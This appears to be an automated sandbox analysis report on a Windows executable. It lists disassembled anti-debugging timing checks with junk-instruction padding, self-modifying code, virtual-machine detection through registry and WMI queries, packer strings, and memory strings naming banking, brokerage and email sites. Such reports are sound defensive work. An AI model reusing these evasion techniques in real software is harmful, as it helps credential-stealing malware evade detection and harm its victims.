Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D306FA second address: 4D3072B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7E7h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9F08C2F7DCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D3072B second address: 4D3073A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D3073A second address: 4D30740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30740 second address: 4D30782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9F08C2E4C6h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9F08C2E4C7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30782 second address: 4D307A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D307A6 second address: 4D307AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D307AA second address: 4D307B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D307B0 second address: 4D307C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D307C4 second address: 4D307C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D307C8 second address: 4D307DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9F08C2E4BAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30831 second address: 4D30849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D30849 second address: 4D3084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe; RDTSC instruction interceptor: First address: 4D3084D second address: 4D3085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3085D second address: 4D30863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30863 second address: 4D3001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9F7995D5B9h 0x0000000f xor eax, eax 0x00000011 jmp 00007F9F08C08F0Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp esi, 00000000h 0x00000028 je 00007F9F08C2F915h 0x0000002e call 00007F9F0D3CB81Ch 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F9F08C2F7E9h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3001F second address: 4D30025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30025 second address: 4D30043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F9F08C2F7DDh 0x00000011 mov ax, C787h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30043 second address: 4D30049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30049 second address: 4D3004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3004D second address: 4D300F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F9F08C2E4C6h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9F08C2E4BEh 0x0000001c xor eax, 5EED06C8h 0x00000022 jmp 00007F9F08C2E4BBh 0x00000027 popfd 0x00000028 mov di, ax 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d pushad 0x0000002e mov bx, cx 0x00000031 pushad 0x00000032 mov eax, 6A383F09h 0x00000037 pushfd 0x00000038 jmp 00007F9F08C2E4C6h 0x0000003d jmp 00007F9F08C2E4C5h 0x00000042 popfd 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 jmp 00007F9F08C2E4C1h 0x0000004b xchg eax, ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D300F6 second address: 4D300FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D300FA second address: 4D300FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D300FE second address: 4D30104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30159 second address: 4D3015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3015F second address: 4D30165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30165 second address: 4D30169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30169 second address: 4D30198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2F7DDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30198 second address: 4D301A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30BCA second address: 4D30BD9 instructions: 0x00000000 rdtsc 0x00000002 mov ch, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, al 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30BD9 second address: 4D30BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30BE0 second address: 4D30C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007F9F08C2F7E8h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov dl, 12h 0x00000017 popad 0x00000018 cmp dword ptr [75AB459Ch], 05h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C17 second address: 4D30C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C1E second address: 4D30C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2F7E8h 0x00000009 xor eax, 27ED7268h 0x0000000f jmp 00007F9F08C2F7DBh 0x00000014 popfd 0x00000015 mov ax, 605Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F9F7994D582h 0x00000022 pushad 0x00000023 mov ebx, eax 0x00000025 jmp 00007F9F08C2F7DCh 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F9F08C2F7DAh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C78 second address: 4D30C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C7C second address: 4D30C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CA8 second address: 4D30CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CAC second address: 4D30CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CB0 second address: 4D30CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CB6 second address: 4D30CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 19C86D03h 0x0000000e jmp 00007F9F08C2F7E1h 0x00000013 xor dword ptr [esp], 6C62F12Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov si, di 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CF4 second address: 4D30D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2E4C0h 0x00000009 sbb si, 0F18h 0x0000000e jmp 00007F9F08C2E4BBh 0x00000013 popfd 0x00000014 mov si, 06CFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b call 00007F9F79953308h 0x00000020 push 75A52B70h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov eax, dword ptr [esp+10h] 0x00000030 mov dword ptr [esp+10h], ebp 0x00000034 lea ebp, dword ptr [esp+10h] 0x00000038 sub esp, eax 0x0000003a push ebx 0x0000003b push esi 0x0000003c push edi 0x0000003d mov eax, dword ptr [75AB4538h] 0x00000042 xor dword ptr [ebp-04h], eax 0x00000045 xor eax, ebp 0x00000047 push eax 0x00000048 mov dword ptr [ebp-18h], esp 0x0000004b push dword ptr [ebp-08h] 0x0000004e mov eax, dword ptr [ebp-04h] 0x00000051 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000058 mov dword ptr [ebp-08h], eax 0x0000005b lea eax, dword ptr [ebp-10h] 0x0000005e mov dword ptr fs:[00000000h], eax 0x00000064 ret 0x00000065 pushad 0x00000066 pushfd 0x00000067 jmp 00007F9F08C2E4C0h 0x0000006c adc cl, 00000078h 0x0000006f jmp 00007F9F08C2E4BBh 0x00000074 popfd 0x00000075 popad 0x00000076 mov esi, 00000000h 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e push ebx 0x0000007f pop esi 0x00000080 mov bx, B13Eh 0x00000084 popad 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40AD5 second address: 4D40AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40AEA second address: 4D40B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F9F08C2E4BEh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B07 second address: 4D40B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3667092Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B11 second address: 4D40B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F9F08C2E4C6h 0x00000011 mov dword ptr [esp], esi 0x00000014 pushad 0x00000015 mov si, B4FDh 0x00000019 call 00007F9F08C2E4BAh 0x0000001e pop edi 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B50 second address: 4D40B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B56 second address: 4D40BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e call 00007F9F08C2E4BBh 0x00000013 movzx ecx, bx 0x00000016 pop edx 0x00000017 jmp 00007F9F08C2E4C2h 0x0000001c popad 0x0000001d je 00007F9F7993BCE7h 0x00000023 jmp 00007F9F08C2E4C0h 0x00000028 cmp dword ptr [75AB459Ch], 05h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40BA9 second address: 4D40BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40BAF second address: 4D40BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9F79953D86h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F08C2E4C7h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40BE6 second address: 4D40C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F9F08C2F7DAh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F9F08C2F7E7h 0x0000001b sub si, B42Eh 0x00000020 jmp 00007F9F08C2F7E9h 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F9F08C2F7E1h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40C65 second address: 4D40C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40CAA second address: 4D40CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2F7E7h 0x00000009 sbb esi, 61E389AEh 0x0000000f jmp 00007F9F08C2F7E9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40CE7 second address: 4D40D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F9F08C2E4C8h 0x0000000f mov di, ax 0x00000012 popad 0x00000013 push esi 0x00000014 mov dx, 7070h 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c jmp 00007F9F08C2E4C5h 0x00000021 pushad 0x00000022 push esi 0x00000023 pop edx 0x00000024 mov edx, esi 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F9F08C2E4BBh 0x00000030 rdtsc
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Special instruction interceptor: First address: 5B8DE4 instructions caused by: Self-modifying code
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Special instruction interceptor: First address: 7E73B6 instructions caused by: Self-modifying code
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe TID: 7468  Thread sleep time: -30015s >= -30000s
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe TID: 7620  Thread sleep time: -210000s >= -30000s
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe TID: 7616  Thread sleep time: -30000s >= -30000s
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
               Source: ARoqFi68Nr.exe, 00000000.00000002.1597554236.0000000000744000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
               Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.0000000001097000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW0r
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: outlook.office.comVMware20,11696492231s
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: AMC password management pageVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: interactivebrokers.comVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
               Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: outlook.office365.comVMware20,11696492231t
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388585295.00000000056C3000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: - GDCDYNVMware20,11696492231p
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: discord.comVMware20,11696492231f
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: global block list test formVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: dev.azure.comVMware20,11696492231j
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: bankofamerica.comVMware20,11696492231x
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: tasks.office.comVMware20,11696492231o
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWL
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: ms.portal.azure.comVMware20,11696492231
               Source: ARoqFi68Nr.exe, 00000000.00000002.1597554236.0000000000744000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: turbotax.intuit.comVMware20,11696492231t
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
